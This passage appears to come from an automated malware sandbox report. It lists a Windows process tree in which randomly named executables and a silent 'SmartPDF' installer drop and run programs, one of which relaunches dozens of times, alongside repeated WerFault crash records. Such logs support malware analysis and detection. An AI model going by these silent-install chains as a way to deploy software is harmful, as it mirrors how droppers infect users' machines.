    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:29380
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:28880
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:24252
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:22744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 22744 -s 24
      4⤵
      PID:29388
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:29128
- - C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    C:\Users\Admin\Documents\sxU18DGPxNelGEbk4Sk8nEP5.exe
    3⤵
    PID:27056
- C:\Users\Admin\Documents\8RabQwXBy87s8gm0uwOzow0v.exe
  "C:\Users\Admin\Documents\8RabQwXBy87s8gm0uwOzow0v.exe"
  2⤵
  - Executes dropped EXE
  PID:1440
- - C:\Users\Admin\AppData\Local\Temp\is-QR0R1.tmp\8RabQwXBy87s8gm0uwOzow0v.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-QR0R1.tmp\8RabQwXBy87s8gm0uwOzow0v.tmp" /SL5="$40110,138429,56832,C:\Users\Admin\Documents\8RabQwXBy87s8gm0uwOzow0v.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:4524
  - - C:\Users\Admin\AppData\Local\Temp\is-TETKI.tmp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-TETKI.tmp\Setup.exe" /Verysilent
      4⤵
      PID:6612
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"
        5⤵
        
        PID:17200
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"
        5⤵
        
        PID:17332
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"
        5⤵
        
        PID:17324
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        5⤵
        
        PID:16780
      - C:\Users\Admin\AppData\Local\Temp\is-L0B4R.tmp\stats.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L0B4R.tmp\stats.tmp" /SL5="$3032C,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        6⤵
        
        PID:2028
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"
        5⤵
        
        PID:17180
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"
        5⤵
        
        PID:17172
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        5⤵
        
        PID:17156
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:7572
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:6612
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:17996
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:15388
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:17456
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:16632
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:19200
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:18760
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:19580
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:18204
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:17696
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20020
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20400
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:18488
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:18636
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:19772
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20368
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:19380
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:12748
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:18504
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:19272
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:19684
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:10560
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:12464
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:13640
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:18056
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20516
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20856
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21172
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21448
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20752
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:17484
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21640
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22120
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22440
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20912
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21220
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21648
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21184
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22328
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22664
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23112
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20608
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21912
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23220
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21320
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23536
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:15396
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21372
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:2404
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21880
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22164
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23680
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24000
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24560
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23560
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24516
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22688
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:21704
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23412
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24664
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:25056
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 25056 -s 24
        7⤵
        
        PID:25564
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:25464
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24480
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:25320
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23572
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22964
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:2112
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:15676
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:19008
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 24
        7⤵
        
        PID:10580
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22872
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22064
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:17380
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:25768
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:26144
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:26544
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:25712
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:17632
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:26496
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20664
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24544
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:8364
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24396
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 24396 -s 24
        7⤵
        
        PID:24572
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23124
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:23772
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27100
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27376
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27128
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24940
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:24216
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:15068
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27864
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:28548
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27880
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:28056
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:28224
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27484
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27468
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27684
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27144
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:25892
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:25912
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:28964
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:29192
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:29604
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:29000
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:29320
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:27072
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:29668
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:22896
- C:\Users\Admin\Documents\0XEwsiYYZ6u9LJcLYHr1ACa4.exe
  "C:\Users\Admin\Documents\0XEwsiYYZ6u9LJcLYHr1ACa4.exe"
  2⤵
  - Executes dropped EXE
  PID:1812
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 656
    3⤵
    - Program crash
    PID:5564
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 672
    3⤵
    - Program crash
    PID:5152
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 632
    3⤵
    - Program crash
    PID:5764
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 664
    3⤵
    - Program crash
    PID:5536
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 1120
    3⤵
    - Program crash
    PID:6832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 1160
    3⤵
    - Program crash
    PID:6876
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 1028
    3⤵
    - Program crash
    PID:7160
- C:\Users\Admin\Documents\jsxfqnVRBjTPrrIYjhrfePI3.exe
  "C:\Users\Admin\Documents\jsxfqnVRBjTPrrIYjhrfePI3.exe"
  2⤵
  - Executes dropped EXE
  PID:3880
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 736
    3⤵
    - Program crash
    PID:5504
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 756
    3⤵
    - Program crash
    PID:6136
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 740
    3⤵
    - Program crash
    PID:5832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 720
    3⤵
    - Program crash
    PID:6048
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 944
    3⤵
    - Program crash
    PID:7144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1192
    3⤵
    - Program crash
    PID:6612
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1236
    3⤵
    - Program crash
    PID:4848
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1320
    3⤵
    - Program crash
    PID:6360
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1284
    3⤵
    - Program crash
    PID:4340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1228
    3⤵
    - Program crash
    PID:4724
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1276
    3⤵
    - Program crash
    PID:7184
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1376
    3⤵
    - Program crash
    PID:7908
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1412
    3⤵
    - Program crash
    PID:7484
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 672
    3⤵
    - Program crash
    PID:8360
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1504
    3⤵
    - Program crash
    PID:8428
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1492
    3⤵
    - Program crash
    PID:9064
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1556
    3⤵
    - Program crash
    PID:6992
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1688
    3⤵
    - Program crash
    PID:7668
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1712
    3⤵
    - Program crash
    PID:5500
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1748
    3⤵
    - Program crash
    PID:6968
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1648
    3⤵
    - Program crash
    PID:9556
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1904
    3⤵
    - Program crash
    PID:10180
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1952
    3⤵
    - Program crash
    PID:9556
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 2032
    3⤵
    - Executes dropped EXE
    - Program crash
    PID:5096
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1652
    3⤵
    PID:10776
- C:\Users\Admin\Documents\YilNE5rR7NHpsMBTGNaz06O4.exe
  "C:\Users\Admin\Documents\YilNE5rR7NHpsMBTGNaz06O4.exe"
